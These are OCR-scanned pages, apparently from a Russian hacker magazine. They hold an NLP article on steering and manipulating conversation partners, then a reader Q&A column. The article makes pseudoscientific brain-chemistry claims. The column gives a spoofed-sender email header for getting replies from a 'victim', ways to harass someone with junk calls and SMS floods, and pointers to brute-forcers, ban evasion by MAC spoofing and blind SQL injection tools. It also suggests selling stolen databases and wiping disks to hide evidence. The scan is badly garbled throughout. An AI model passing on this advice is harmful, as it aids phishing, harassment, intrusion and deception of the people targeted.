ник говоритполный бред, мы можем себе позволить соглашаться, пока из 
этого бреда не вытекают действия лично нам неудобные. Атогда уже важно 
направить разговор в нужное русло или, другими словами, включить третий 
процесс раппорта: ведение. 

■ БОЛЬШЕ СЛОВ ИЛИ РЕЧЕВОЕ ВОЗДЕЙСТВИЕ 

Большинство людей привыкло искатьсмысл втом, что им говорят. И еслиты 
разговариваешьс девушкой о любимом журнале Пакер, то, конечно, полез- 
но погрузиться в процесс общения, вслушиваясь в смысл каждого слова. 
Авотеслиты предполагаешь, что решаются какие-то ключевые вещи во 
взаимоотношениях, то необходимо отделять смысловые псевдозначения 
слов от взаимодействия, при котором люди друг от друга хотят каких-то по- 
веденческих изменений. Все время спрашивай себя: зачем мне сейчас это 
говорят? Чего от меня хотят? Поступая так, ты как бы дистанцируешься от 
«смысла», обращаешь внимание лишь нато, чего теми или иными словами 
хочет добиться оттебя собеседник, какую именно поведенческую реакцию 
он хочет вызвать. Сегодня мы стобой будем учить, что слова — это не всегда 
смысл, они инструмент для изменения поведения другого человека. 



Ритмы мозга 
и раппорт 

Картина поведения человека отражает ритмы работы его мозга. 
Внешние признаки, как то — движение глазных яблок, частота мор- 
гания, дыхание, скорость речи, движения рук, смена поз, являются 
индикаторами частоты ритма, согласно которому работает в этот 
момент нервная система человека. Подстройка под ритм собеседника 
приближает нас к идеальным условиям восприятия им наших слов. 
Когда соответствие ритмов достигнуто, можно понижать активность 
партнера, замедляя ритм собственного поведения (частоту дыхания, 
скорость речи и т.д.) . Со стороны партнера произойдет неосознанное 
подражание. В стволе головного мозга вашего собеседника в этот 
момент выделяются специальные вещества, что в итоге приводит 
к ослаблению синоптических связей, облегчая восприятие новой 
информации (внушений) . 



Какты думаешь, кто наполняетсмыслом и содержанием слова?Тот, 
кто говорит? А вот и нет! Смысл в них вклады ваеттот, кто слушает, твой 
собеседник, любимая девушка. Несомненно, ты вкладываешь в свою речь 
«смысл» — но тот, для кого ты ее произносишь, вкладывает в нее свой 
собственный смысл. Представь, сидите вы в ресторане с девушкой и едите 
лягушачьи лапки. Ты ей говоришь: «что-то улапок этих, лягушачьих, вкус 
специфический». В слово «специфический»™ мог вложить любой смысл, 
и, поди разберись, хороший вкусулапок или плохой? На что получаешь 
ответ: «ага, специфический, по вкусу, как резиновая курица» — девушка 
вложила свое понимание специфичности вкуса и даже приблизительного 
его описала. Сейчас нам стобой нужно принять за аксиому: важно нето, о 
чем говорят, а то, зачем говорят, с какой целью. Если ты хочешь влиять на 
людей и при этом не вестись на влияние других и контролировать ситуацию, 
все время держи в голове вопросы: зачем он мне это сказал? Чего хочет от 
меня добиться? 

— Милый, ты ничего незамечаешь? 

— Нет. 

— Это же просто неприлично! 

— Дайже мне посмотреть телевизор, чтоя неприличного делаю?» 

Дама убегает в слезах и потом неделю стобой не разговаривает. И обрати 
внимание, помог тебе смысл сказанных ею слов? А если в самом начале 
разговора держать в голове вопросы: «зачем она мне это говорит и какого 
действия ждет?», можно было проконтролировать ситуацию и добиться 
иного эффекта. Вотто-то и оно. 

То, что наши стобой собеседники вкладывают какой-то свой «смысл» в 
слова, нам на руку. Можно использовать это как инструмент. Каким обра- 
зом? Очень просто. Например, используя неопределенные имена, можно 
говорить такими фразами, когда ничего конкретного не сказал, а всем все 
понятно, каждый додумал (вложил) свой смысл. И нам удобно, и им хорошо. 



Зарождение НЛП 

В начале 70-х годов будущий создатель НЛП, Ричард Бэндлер, будучи 
студентом математического факультета Калифорнийского универси- 
тетв в Санта Круз, вдохновленный беседами с другом семьи, которому 
было известно множество современных новаторских терапевтичес- 
ких школ, решает изучать психологию. После тщательного ознаком- 
ления с методами работы ведущих терапевтов Бэндлер открыл для 
себя, что, если в точности воспроизводить успешные шаблоны поведе- 
ния, можно достичь эффективных результатов в собственной работе 
с людьми. Это открытие и стало основой революционного подхода в 
НЛП, названного Копированием Человеческого Совершенства. 
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Синоптическая передача информации. Внуше^ 
ния в НЛ П имеют под собой физиологическую 
основу| 




Самопрограммирование похоже на 
настройкутелевизионных каналов. 
Какзапрогр аммируешь, такая иД 
х^ізньбудетЯ 



X ТАКТИЧЕСКИЕ ПРИЕМЫ ИЛИ МАГИЯ ЯЗЫКА 

Все описанные выше приемы направлены на создание 
атмосферы согласия, изменение мировоззрения слушающе- 
го и внушение. Но бывает и так, что во время общения тебе 
не нравится тема разговора, нечего сказать или не хочется 
оправдываться. Тогда становятся необходимы тактические, 
гибкие приемы ухода от вопроса обсуждения. Существуюттри 
способа ненавязчивого ухода оттемы, а именно — говоритьо 
большем, о меньшем и о другом. 

ХО БОЛЬШЕМ 

Собеседник говорито малом, говори с ним о большем. То есть 
он тебе о мебели, ты ему о квартире. 

«— Какая несуразная мебель! 

— В этой квартире много несуразной мебели, я впервые вижу 
такую странную квартиру...» (и все, дальшеты говоришь о 
квартирах, произошла смена темы). 



ХПРИЕМ ИСПОЛЬЗОВАНИЯ НЕОПРЕДЕЛЕННЫХ ВРЕМЕН 

«Дима и Костя, два первоклассных хакера, используют разные методы 
взлома, метод Димы в 100 раз лучше метода Кости», или «Некоторые хакеры 
используют разные методы взлома, кое-какие из этих методов гораздо 
лучше прочих». В первом случае тебя ждет ожесточенный спор отом, какой 
же именно метод Димы лучше, да еще и в 100 раз, и где факты и доказа- 
тельства? Во втором же случае спорить не о чем, утверждение не вызывает 
сопротивления со стороны собеседника, слишком неконкретное, но зато 
какое логичное. Используя слова, которые ничего не значат, ты делаешь 
речь более содержательной, давая возможность собеседнику додумать 
смысл неопределенных имен и, конечноже, согласиться с твоим утвержде- 
нием. А нам того и надо. 

Ш ПРИЕМ ИСПОЛЬЗОВАНИЯ МОДАЛЬНОГО ОПЕРАТОРА 

Если ты хочешь обойти сознание собеседника, подкрасться, так сказать, 
стыла, используй такие слова, как: можно, возможно, можетбыть, могут, 
можешь. Формулировка «Ты не можешь позволить себе диктовать мне 
условия» фактически означает: «Ты не должен диктовать мне условия». 
Используя словоформы возможности, ты можешьформировать неоспори- 
мые высказывания. «— Моя девушка практикует методы взлома? — Нет. 

— Моя девушка может практиковать методы взлома? — Конечно» (получи- 
лось неоспоримое высказывание, ведь потенциальнотакая возможность 
существует). Сравни: «Я утверждаю, что все мужское население мечтает 
попасть на страницы журнала ][акер» и «Возможно, все мужское население 
мечтает попасть на страницы журнала ][акер». Добавили слово «возможно» 
и уже получили неоспоримое утверждение. Разговаривая с собеседником 
в рамках допущения возможности, мы заранее предупреждаем спор. Если 
человек начнетспорить, ты можешь аргументировать, что говорил лишь о 
возможности. 

Я ПРИЕМ ИСПОЛЬЗОВАНИЯ ЭМОЦИОНАЛЬНЫХ ОЦЕНОК 

Эмоциональные оценки чего-либо или кого-либо ничего не прибавляютк 
фактическому состоянию дел, но оставляют осадок, как в анекдоте: «Ложеч- 
ки-то нашлись, а осадок остался». Эмоции хорошо отвлекают от недоста- 
ющей в разговоре информации. Например, утверждение: «Она всегда за 
себя постоит». Первый собеседник подумает: «какая молодец, сможет дать 
отпор». Второй подумает: «она мужеподобная и не женственная, это плохо». 
Третий еще что-нибудь свое подумает. А если утверждать: «Она храбрая, 
смелая, решительная», то каждый, кому ты это сказал, представит что-то 
свое («она сумеетза себя постоять», «она решительно берется за сложные 
задачи»), но все испытают одинаковые эмоции. Поэтому, правильно ис- 
пользуя оценки в своих высказываниях, ты можешь влиять на эмоциональ- 
ный отклику собеседника в зависимости оттого, какой откликтебе нужен. 
Фраза: «Игра футбольной команды в этом сезоне гадка и омерзительна» 
совсем не равна фразе: «Несколько неудачных игр футбольной команды в 
этом сезоне немного меня огорчают». То есть с помощью оценокты можешь 
направлять эмоциональное состояние собеседника в нужноетебе русло. 



ХОМЕНЬШЕМ 

Собеседникговорито большем, говори с ним о меньшем. Например, она 
тебе о платье, ты ей о пуговицах. 

«— Какое кошмарное платье мне подарила мама! 

— А, по-моему, эти пуговицы на платье весьма интересны, отвечают пос- 
ледней тенденции в моде» (дальшеты про пуговицы и модныетенденции, 
смена темы произошла). 

X О ДРУГОМ 

Собеседниктебе про ежа, аты ему про зайца. Можно использовать весьма 
наглый прием, не выкручиваться внутри темы, а сразу ее сменить. 

«— Что ты можешь сказать о своих постоянных опозданиях на свидания? 

— Яумело распоряжаюсьсвоим временем, многиеудивляются, какмне это 
удается...» (резкая смена темы в нужном нам русле). 

X САМОПРОГРАММИРОВАНИЕ 

Самопрограммирование — это воздействие на самого себя, управление 
своимтелом и внутренним миром. Какие тебе от этого бонусы? Например, у 
тебя плохое настроение, ушла любимая девушка, друг наорал или еще ка- 
кая-то неприятность случилась. Самопрограммирование позволяет менять 
собственное восприятие ситуации, выйти из некомфортного состояния. 
Одна из простейшихтехникзаключается в переключении внимания с од- 
ного надругое, как переключениетелевизионных программ. Расскажу, как 
это делать. Когда тебе оченьхорошо, запомни свой рисунок дыхания (тип 
дыхания) или определенные ощущения (тепло потелу, приятное пэкалыва- 
ние, еЕс) . И когда тебе понадобится выйти из неприятного переживания, то 
установи запомнившееся в радостном состоянии дыхание, сосредоточься 
на ощущении теплоты по телу. Ты волен выбрать нужное состояние и сосре- 
доточиться на нем, и пусть кто-то там кричитза кадром, нас это уже не очень 
волнует. Давно известно, если запомнить дыхание состояния, когда ты уве- 
рен, что что-то хорошее случится, то потом, переключаясь в это состояние, 
ты увеличиваешь вероятность возникновения того, что нужное сбудется. 
Если станет интересно разобраться подробнее, об этом много написано у 
Джона Гриндера и Джудит Делозье. Техниксамопрограммирования много. 
Можно работать со своим бессознательным и достигать невероятных 
результатов. Но об этом уже в другой раз. 

Ш НАПУТСТВИЕ 

Как бы ни хотелось сделать статью резиновой, а уместить все методики и при- 
емы НЛП не получится. Многие люди знаютоб НЛП, но профессионалы от- 
личаются от этого большинства тем, что они нетолько знают, но и применяют 
знания. Чего и тебе желаю. Как итог всей статьи, у тебя в голове должна была 
отложиться некоторая формула эффективного влияния: откалибровать, под- 
строиться, вести и снова откалибровать, а далее по циклу. Похоже на танец, 
только не с бубном, а в паре с девушкой. Ведет всегда мужчина, а вь глядит 
танец, как сотрудничество мужчины и женщины. Так и в НЛП, ты ведешь, но 
стремишься, чтобы общение выглядело как сотрудничество с максимально 
добровольным участием партнера. А остальное делотехники.^с 
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ЗАДАВАЯ ВОПРОС, ПОДУМАЙ! НЕ СТОИТ ЗАДАВАТЬ ОТКРОВЕННО ЛАМЕРСКИЕ ВОПРОСЫ, ОТВЕТЫ НА 
КОТОРЫЕ ТЫ ПРИ ОПРЕДЕЛЕННОМ ЖЕЛАНИИ МОЖЕШЬ НАЙТИ И САМ. КОНКРЕТИЗИРУЙ! МЫ НЕ ТЕЛЕ- 
ПАТЫ, ПОЭТОМУ ПРИСЫЛАЙ КАК МОЖНО БОЛЬШЕ ИНФОРМАЦИИ. 



0: Подскажи скрипт для сбора 
статистики на своих страничках, 
пользоваться паблик-счетчиками 
не хочу. 

А: Могу тебе посоветовать очень 
хорошую фри -статистику, написан- 
ную на РНР, — ѵѵѵѵѵѵ.рбртѵѵізііез. 
из . Сам ей пользуюсь и очень 
доволен. Туттебе и перевод на мно- 
жество языков, и подробная инфа 
по посетителям (ІР-адреса, разре- 
шения экрана, браузер, установ- 
ленные плагины, страницы входа и 
выхода, просмотренные страницы 
на сайте, геолокации с красивой 
картой мира, рефереры, поисковые 
запросы, по которым посетители 
пришли ктебе, возможность под- 
ключ ить стати сти ку к з а гружа е м ы м 
файлам утебя на сайте и еще много 
всякого разного добра). Все эти 
вкусности достигаются простой 



вставкой ^ѵа5сгір{-кода в сорцы 
твоей странички. Имхо, это самый 
лучший аналог пабл ик-счетчико в. 
Пользуйся :). 

О: Видел в кино, как с помощью 
какого-то вируса супермегахаке- 
ры потопили несколько танкеров 
с нефтью. Возможно ли такое в 
реальной жизни? 

А: Знаешь, все эти истории о том, 
как кто-то взломал серверы Пен- 
тагона и обнаружил на них секрет- 
ную информацию о контакте с Вне- 
земным Разумом, мягко говоря, не 
вызывают доверия. Основываясь 
на личном опыте, могу сказать, 
что в открытом доступе в инете (в 
том числе и на государственных 
сайтах) не может быть никакой 
секретной кнопки управления 
военной или другой инфраструк- 



турой и каких-либо секретных 
документов. Единственное, чем 
ты можешь поживиться, — это 
базы данных с полной инфой на 
всех сотрудников какого-нибудь 
госдепартамента. Так что не стоит 
верить во все подряд голливудс- 
кие басни :). 

0: Есть ли действенные методы по 
быстрому поднятию РК странички 
у Гугла? 

А: Такие методы действительно 
есть, и ими пользуются все крутые 
сеошники. Если необходимо быстро 
поднять общий вес какой-либо 
странички в выдаче Гугла, ты дол- 
жен сделать следующее: 

1 . Оптимизировать свою пагу для 
поисковика: выделить кейвор- 
ды тэгами <Ы -6жейворд</Ь6>, 
<зІгопджейворд</зІгопд> ит.д., но 



ни в коем случае не переборщи с 
ними. 

2. Заказать или написать самому 
уникальный текст по заданному 
кей ворду. 

3. Проставить линки на свою пагу 
в социальных пиаристых сетях 
или, если есть такая возможность, 
проставить ссылки на так называе- 
мых «мордах» пиаристых сайтов, 
поскольку 4-5ссылокс морд РВ=6 
гарантированно дадут твоей паге 
РП=5 во время следующего гуглдэн- 
са и пересчета пиара. 

0: Часто встречал загадочные 
слова «парсить», «парсер». Что 
это такое? 

А: Все очень просто. Парсить 
— значит перестраивать любую 
информацию в удобоваримый вид. 
Например, существуют парсеры 
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отчетов троянов, которые систе- 
матизируют отчеты и помогают 
находить в них нужную инфу; есть 
парсеры выдачи Гугла, которые 
приводят список ссылок с уязви- 
мым скриптом к одному удобному 
виду, позволяющему автоматизи- 
ровать процесс взлома. Сейчас 
наиболее популярны именно 
парсеры выдачи Гугла (напри- 
мер, по поиску бажных форумов и 
блогов). Просто тактебе их никто 
не даст. Обычно они заказываются 
на хак-форумах у кодеров за энную 
сумму. 

0: Возможно ли взломать запаро- 
ленные гаг-, гір-архивы и т.п.? 

А: Такое возможно только с помо- 
щью метода перебора паролей 
— брутфорса. Благо программ для 
этих целей существует великое 
множество. Могу посоветовать 
пропарсить страничку Ыір:// 
сотргевзіоп.ги/агсіезі/сгаскегз/ 
гірсгаск.Ыт на предмет сабжа :). 
Ты сможешь скачать оттуда любой 
понравившийся брутфорсер и 
незамедлительно начатьломать 
архив. 

0: Нашел баг в крупном онлайн- 
сервисе. Посоветуй, что делать: 
сообщить админам или юзать его в 
своих целях? 

А: Вопрос, конечно, интересный. 
Если не хочешь проблем с законом, 
то, конечно, лучше сообщить 
администраторам сервиса. Тут, 
кстати, тебя могут ожидать некото- 
рые бонусы. К примеру, тебе могут 
предложить работу багфайндера 
на постоянной основе. И если ты 
согласишься, будешь мониторить 
этот сервис на предмет багов и 
получать за это деньги. Но это все 
как-то не по-хакерски :]. От прода- 
жи базы данных крупного сайта тем 
же самым спамерам хакер может 
выручить несколько килобаксов. 
Так что думай сам и поступай по 
совести. 

Р.5. Взломав онлайн-игру, можно 
продавать ее персов за очень 
хорошие деньги, поскольку один 
перс втойже самой БКстоитдо 1 0к 
долларов. 



0: Правда ли что где-то на халяву 
раздают короткие ІСО-уины? 

А: Правда. Очень часто только что 
открывшиеся, ноуже амбициозные 
порталы устраивают раздачу ко- 
ротких ІСО-уинов, чтобы заинтере- 
совать пользователей и увеличить 
свою посещаемость. Обычно разда- 
ются семи- и восьмизнаки, но, если 
постараться, то можно отыскать 
и шестизнаки :). Как найти такие 
порталы с халявой? Очень просто, 
введи втом же Яндексе что-нибудь 
типа «раздача I СО» и походи по 
ссылкам. Без короткого номерка ты 
точно не останешься :). 

0: Не знаешь, какие существуют 
альтернативные асечные клиен- 
ты для Смарта под управлением 
05 ЗутЬіап? СИР и Лтт исполь- 
зовать не хочу, так как они часто 
глючат, а Л тт еще и кушает 
много оперативной памяти. 

А: Могу посоветоватьасечный кли- 
ентБтйреВ, ранее известный как 
Ѵтісц. Вотлишь неполный список 
его возможностей: 

• работа с несколькими 100-профи- 
лями одновременно; 

• работа с группами пользователей; 

• поддержка Х-статусов (больше 
всего мне понравился дополнитель- 
ный Х-статус «Трава»); 

• большой выбор скинов и смайлов; 

• глобальный поиск ІСО-контактов; 

• хранение истории переписки с 
возможностью поиска; 

• возможность изменения шрифта в 
окне чата; 

• сортировка контактов; 

• антиспам-фильтр; 

• идентификация ІССІ-клиента собе- 
седника и многое-многое другое. 
Скачать клиентты можешь на 
официальном сайте ЬНрѴ/зтаре. 
сот (только, когда будешь вбивать 
ссылку, не перепутай тсп, иначе 
попадешь на официальный сайт 
Гарри Поттера). 

0: Привет, возникла такая про- 
блема: забанили акк в сетевом 
торрент-трекере. Для новой реги- 
страции требуется ввести внутри- 
сетевой ІР маски 1 23.1 23.***.***, 
но, так как на него был зареган 



мой аккаунт, система выдает со- 
общение о двойной регистрации. 
Можно ли как-нибудь подменить 
этот ІР? 

А: По сабжутебе необходимо 
просканить сеть прогой БапБсоре, 
предварительно задав диапа- 
зон ІР-адресов этой сети. Далее 
софтиной БапБру исследуешь 
выбранный комп. Она выдасттебе 
МАС-адрес компа, аты спокойно 
впишешь его в настройки сети, 
предварительно заменив свой ІР 
тем, который насканил. Если же 
привязки к МАС’у нет, то просто 
выбери ІР из диапазона твоей 
сети. 

Р.5. Скачать проги можно здесь: 
ѵѵѵѵѵѵ.ІапІгіскБ.сот . 

О: Недавно приобрел іРосІ, очень 
расстроила невозможность 
закачки песен через обычный 
проводник Винды. Отсюда вопрос: 
как в обход іТипез залить песни в 
мой любимый ІРосІ? 

А: Тебе нужно просто перепрошить 
твой плеер. Могу посоветовать 
прошивку РОСКВОХ, ознакомить- 
ся с которой подробнее можно 
тут: ѵѵ\л/ѵѵ.Ьрс.ги/рба/Ьоагб/іпсІех. 
рЬр?і=78023 . Она позволиттебе 
следующее: 

• прослушивать на іРосГе музыку, 
залитую напрямую (к примеру, через 
проводник в Винде); 

• просматривать папки также, как и 
в проводнике Винды; 

• удалять файлы; 

• переименовывать файлы; 

• перемещать файлы и копировать 

ИХ; 

• получить доступ к отличному эква- 
лайзеру (количество настроектебя 
приятно удивит); 

• загружать разные скины и еще 
многое другое. 

Причемустановка ВОСКВОХне 
уничтожити не повредит твои дан- 
ные в ІРосГе. 

Р.5. Отличный сайтпо модификации 
ІРосГе — ѵѵѵѵѵѵ.іросііпд.ги . 

Р.Р.5. А можешь поставить програм- 
му Апароб Ехріогегс ападеаг.сот 
(учти, она платная) и наслаждаться 
жизнью без перепрошивки плеера 
(примечание РогЬ’а) :). 



0: Как отправить мыло с подменой 
адреса отправителя? 

А: Для этих целей существует 
множество программ. Но если ты не 
хочешь сильно заморачиваться и 
ставить или писать самостоятельно 
сложный софт, то могу посоветовать 
онлайн-скрипты, например: ѵ\лллл/. 
гадпаг.іиі .ги/таіІ.рЬр . ГіНрУ/тагк- 
2007.дпо-пеЕги/апотт.рЬр . 

0: Подскажи, как получить ответ 
на заведомо несуществующее 
мыло? Например, я отправляю 
письмо с адреса Ьі11у_да(е5(а 
тісгозоН.сот и хочу получить от- 
вет от жертвы. Возможно л и это? 
А: Возможно :). Для этого тебе не- 
обходимо всего лишьуказать свое 
настоящее мыло в хидере Веріу-То, 
например: 

То : коти@таі1 . сот 
Ргот: Віііу <Ъі11у_даке5@ 
тісгозоГБ . сот> 

Керіу-То: ЗиррогР <ТВОЕ_ 
МЫЛО> 

0: Как закидать телефон недоб- 
рожелателя МУСОРНЫМИ 5Ш5 И 
звонками? 

А: Поместить в газету бесплат- 
ных объявлений, например «Из 
рук в руки», заметку о продаже 
машины/квартиры/хомячка/руч- 
ной канарейки и указать телефон 
недоброжелателя :). А вообще в 
привате существуют зтз-флудеры, 
можешь поспрашивать на форумах в 
разделах раздачи приватного софта 
(где искать такой софт, я писал в 
прошлом номере). Но помни: флу- 
дить нехорошо, тебя будут мучить 
угрызения совести :). 

0: Посоветуй оптимальный метод 
уничтожения информации на 
компе. 

А: Метод включает в себя несколько 
этапов: 

1 .Удали всю инфу обычным мето- 
дом. 

2. Поставь программу Апб Тгаскз. 

3. Вайпани свободное место на 
диске. 

4. Этой же прогой почисть все 
временные файлы, предварительно 
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поставив алгоритм Гутмана. 

Также можешь использовать ССІеапег. 
В настройках укажи конкретную папку 
для удаления и ЫБА (7 проходов). 
Лучше вайпить весь диск, потому 
что может остаться инфа, которуюты 
небезопасно удалил ранее. 

А вообще, впредь будь аккуратнее, 
чтобы тебе не требовалась опера- 
ция удаления инфы, прячь комп у 
бабушки/соседей/девушки. 

0: Активно тестирую всевозмож- 
ные сценарии на уязвимости и 
столкнулся с необходимостью 
использовать специальные сред- 
ства для слепой 50І_-инъекции. К 
сожалению, все, что мне удалось 
найти, моим запросам не удов- 
летворяет. Может быть, посове- 
туете какие-нибудь конкретные 
утилиты? 

А: Напомню, что в случае слепой 
БОБ-инъекции (ЫіпсІ БОБ іпіесбоп) 
сообщение об ошибках не выводит- 
ся, поэтому при реализации такой 
атаки все действия приходится 
производить вслепую и, как прави- 
ло, подбором. Поскольку подбирать 
можно сколь угодно долго, реали- 
зовать подобную атаку довольно 
сложно. В связи с этим существует 
несколько инструментов, которые 
позволяют этот процесс упростить. 
АЬзіпіЬе [ ѵѵѵѵѵѵ. и пзес.пеіАіоѵѵпІоасІ/ 
ЬздІЬБрІ ) — одна из наиболее извест- 
ных утилит, позволяет автомати- 
зировать процесс закачки схемы и 
содержания базы данных посредс- 
твом ВІіпсІ БОГ Іпіесбоп. Благодаря 
6111-интерфейсу использовать ее 
довольно просто. 

ВІіпсі БОБ Іпіесііоп РегІТооІ [ ѵѵѵѵѵѵ. 
ипзес.пеі/сІоѵѵпІоасІ/ЬзцІЬЕрІ ) — как 
несложно догадаться из названия, 
это уже перловый скрипт, но также 
весьма эффективный. 

БОБ Іпіесііоп ВпЛе-Ьгсег [ ѵѵѵѵѵѵ. 
ореп-ІаЬз.ога/здІіЬИ^еІаІ Таг. 
дг ] — эта утилита не является узко- 
специализированной и позволяет 
проверить исследуемый сценарий 



на наличие БОБ-уязвимости, а в 
случае необходимости — упростить 
процесс ВІіпсІ-инъекции. 

БОБВгиІе [ ѵѵѵѵѵѵ. | изб псіагке. 
сот/зесигку/здІЬгиІе.ру ) автома- 
тизируетутомительный подбор 
параметров для реализации слепой 
БОБ-инъекции. Тулза примечатель- 
натем, что написана на РуШоп’е и 
поддерживает многопоточность, при 
этом используеттолько стандартные 
библиотеки. 

БОБМар ( здітар.зоигсеіигае.пеі: ) 
наделена сразу несколькими функ- 
циями, такими какопределениетипа 
базы данных по сообщениям об ошиб- 
ках (бпдегрппД реализация ВІіпсі БОБ 
іп)есбоп и ІпЬапсІ БОБ іп]есІіоп и пр. 

0: Что такое І50Ы и как это исполь- 
зовать? 

А^БОЫ [англ. ^ѵаБсгірІ 0Ь)ес1 
Ыоіабоп) — это специальный 
текстовый формат, который часто 
используется для передачи струк- 
турированных данных по сети. Ос- 
нованный на ^ѵаБсгірБ он обычно 
применяется именно с этим языком 
и представляет собой альтернативу 
традиционному формату ХМБ. Прак- 
тическая польза использования 

открывается при применении 
технологии А^Х. Формат 
является более кратким и удобо- 
читаемым по сравнению с ХМБ. 
Крометого, в ^ОЫ-код возможна 
вставка вполне работоспособных 
функций. Воттак, например, можно 
представить информацию о нашем 
редакторе РогЬ’е и преобразовать 
ее в ^ОЫ-формат. 

ѵаг сІаБа - {паше: 'РогЬ' , 
оссираБіоп: ' Бикіп 
Ьаскег', аде: 25}; 

ОЬзесБ . БоТБСЖ (ЬаБа) ; 

//-> '{"паше": "РогЬ", 
"оссираБіоп" : "Бикіп 
Ьаскег", "аде": 25}' 

О б работать такую структуру также 
просто: 



ѵаг ЬаБа = ' { "паше" : 
"РогЬ", "оссираБіоп": 

" Бикіп Ьаскег" 

} ' . еѵаі ЬЗОЫ ( ) ; 

Ьа Б а. пате; 

//-> "РогЬ" 

Какуже было сказано, чаще 
всего используется для передачи 
информации при применении А^АX: 

пеѵѵ Азах.КесзиезБ ( ' /зоше_ 
игі ' , { 
шеББюЬ: ' деБ ' , 
опЗиссезз : 

ГипсБіоп (БгапзрогБ ) { 
ѵаг ^ зоп = БгапзрогБ . 
гезропзеТехБ . еѵаІЬЗСЖ ( ) ; 

} 

}) ; 

0: Как синхронизировать кален- 
дарь и контакты на различных 
устройствах (например, телефоне 
Иокіа, ноутбуке с установленным 
МісговоЙ ОиНоок и т.д.) с онлайн 
почтовым клиентом или плани- 
ровщиком? 

А: Если говорить о синхронизации 
отдельно взятого устройства и 
компьютера, то никаких проблем 
тут нет. Совсем другой вопрос: как 
синхронизировать одно из этих 
устройств с онлайн-сервисом, 
скажем с бтаіі (адресной книгой 
почтового клиента) и боодіе 
Саіепбагэ. Долгое время не было 
никакого толкового способа, но 
сейчас, наконец, появился отлич- 
ный онлайн-сервис Ріахо. После 
регистрации на сервисе все, что 
необходимо сделать, — это соз- 
дать «точки синхронизаций» (Бупс 
роіпЫ и связать аккаунт боодіе 
с Ріахо. Как этот сервис будет из- 
влекать данные из локальных про- 
грамм твоего компьютера? Очень 
просто, нужно лишь скачать и 
установить небольшой плагин для 
ѴѴіпсІоѵѵз (0№се Оиііоок, ОиНоок 
Ехргезз или Почта ѴѴіпсІоѵѵз), 
который должен быть связан с 




Ріахо. Думаю, с остальным ты 
разберешься сам. 

0: Я хочу, чтобы мой ѴѴіпсІоѵѵз 
Резкіор максимально напоминал 
никсовую графическую оболочку 
КОЕ. Реал ьно л и это сделать? А 
может быть, есть способ запускать 
предназначенные для этой графи- 
ческой среды приложения? 

А: Возможно, ты удивишься, но 
процесс портирования КОЕ под 
ѴѴіпсІоѵѵз-платформу идет полным 
ходом! И хотя до его окончания 
еще далеко, уже сейчас в Сети 
доступны промежуточные резуль- 
таты реализации этой довольно 
необычной идеи. Да-да: КОЕ под 
ѴѴіпсІоѵѵз можно запустить уже 
сейчас! Для установки необходимо 
проделать следующее: 

1 . Скачать инсталлятор с сайта 
сІоѵѵпІоасІ.седіБсІе/ксІе-ѵѵіпсІоѵѵз/ 
іпзіаііег . 

2. Записать инсталлятор в 
заранее созданную директорию 
(скажем, СДК0Е4) и запустить 
его. Далее необходимо выбрать 
устанавливаемые пакеты и при- 
ступить к установке. На текущем 
этапе существует сразу два 
варианта сборки пакетов, скомпи- 
лированных с помощью МБ Ѵізиаі 
Біисііо и бесплатного компилятора 
МіпОѴѴ дсс. По большому счету 
разницы никакой нет, нотебе 
нужно выбрать только один из 
этих вариантов. 

3. Создать переменную окружения 
К0Е0ІР5, указывающую на путь 
кустановленной К0Е4 (в нашем 
случае С:\К0Е4). 

4. Добавить путь до библиотек КОЕ 
(С:\К0Е4\ІіЬ) в переменную окруже- 
ния РАТН. 

Теперь можно запускать приложе- 
ния из папки С:\К0Е4\Ьіп. Правда, 
в настоящий моментпортирование 
находится на ранней стадии, в связи 
с чем продукты, не входящие в КОЕ по 
умолчанию (скажем, плеер Атагок), 
пока еще не портированы. И-И 
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Теперь ты можешь получать журнал с КУРЬЕРОМ не только в Москве, но и в Санкт-Петербурге, Уфе, 
Нижнем Новгороде, Волгограде, Казани, Перми, Челябинске, Омске. 



ВНИМАНИЕ! ВТОРОЕ СПЕЦПРЕДЛОЖЕНИЕ! 




ЗА 12 МЕСЯЦЕВ 



При подписке на комплект журналов 

ЖЕЛЕЗО ВУВ + ХАКЕР ВУВ + ІТ СПЕЦ Сй: 

- Один номер всего за 147 рублей 
(на 25% дешевле, чем в розницу) 



ЗА 6 МЕСЯЦЕВ 






ВЫГОДА • ГАРАНТИЯ • СЕРВИС 



КАК ОФОРМИТЬ ЗАКАЗ ВНИМАНИЕ! 



1. Разборчиво заполните подписной купон и квитанцию, выре- 
зав их из журнала, сделав ксерокопию или распечатав с 
сайта \л/\ш.дІс.ги. 

2. Оплатите подписку через Сбербанк . 

3. Вышлите в редакцию копию подписных документов — купо- 
на и квитанции —любым из нижеперечисленных способов: 

• по электронной почте 5иЬ5СГІЬе@дІс.ги; 

• по факсу 8 (495) 780-88-24; 

• по адресу 119021 , Москва, 

ул. Тимура Фрунзе, д. 11, стр. 44, 

ООО «Гейм Лэнд», отдел подписки. 



Подписка оформляется в день обработки 
купона и квитанции в редакции: 

• в течение пяти рабочих дней после отправки подписных доку- 
ментов в редакцию по факсу или электронной почте; 

• в течение 20 рабочих дней после отправки подпис 
ных документов по почтовому адресу редакции. 

Рекомендуем использовать факс или электронную почту, в пос- 
леднем случае предварительно отсканировав или сфотографиро- 
вав документы. 

Подписка оформляется с номера, выходящего через один 
календарный месяц после оплаты. Например, если вы произ- 
водите оплату в ноябре, то журнал будете получать с января. 









Подписка на журнал «ХАКЕР+ОѴР» на 6 месяцев стоит 1080 руб. Подарочные журналы при этом не высылаются 



По всем вопросам 



связанным с подпиской, звоните по бесплатным телефонам 8(48Е97808&29(для москвичей) 
и 8(80СРОСѴЗШЭ(для жителей других регионов России, абонентов сетей МТС, БиЛайн и Мегафон]. Вопросы 
о подписке можно также направлять по адресу іпіо@дІс.ги или прояснить на сайте ш/ш.ОЬС.ги 

ПОДПИСНОЙ КУПОН 

ПРОШУ ОФОРМИТЬ ПОДПИСКУ НА ЖУРНАЛ «ХАКЕР» 



ПОДПИСНОЙ КУПОН 

ПРОШУ ОФОРМИТЬ ПОДПИСКУ 

НА ЖУРНАЛ « » 

]] на 6 месяцев 
| | на 12 месяцев 

начиная с 2008 г. 

I — I Доставлять журнал по почте 
' — * на домашний адрес 
Доставлять журнал курьером : 

□ на адрес офиса* 

□ на домашний адрес** 

(отметь квадрат выбранного варианта подписки) 

Ф.И.О. 



АДРЕС ДОСТАВКИ: 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( _ ) 

е-таіі 

сумма оплаты 

*в свободном поле укажи название фирмы 
и другую необходимую информацию 
**в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 

свободное поле 
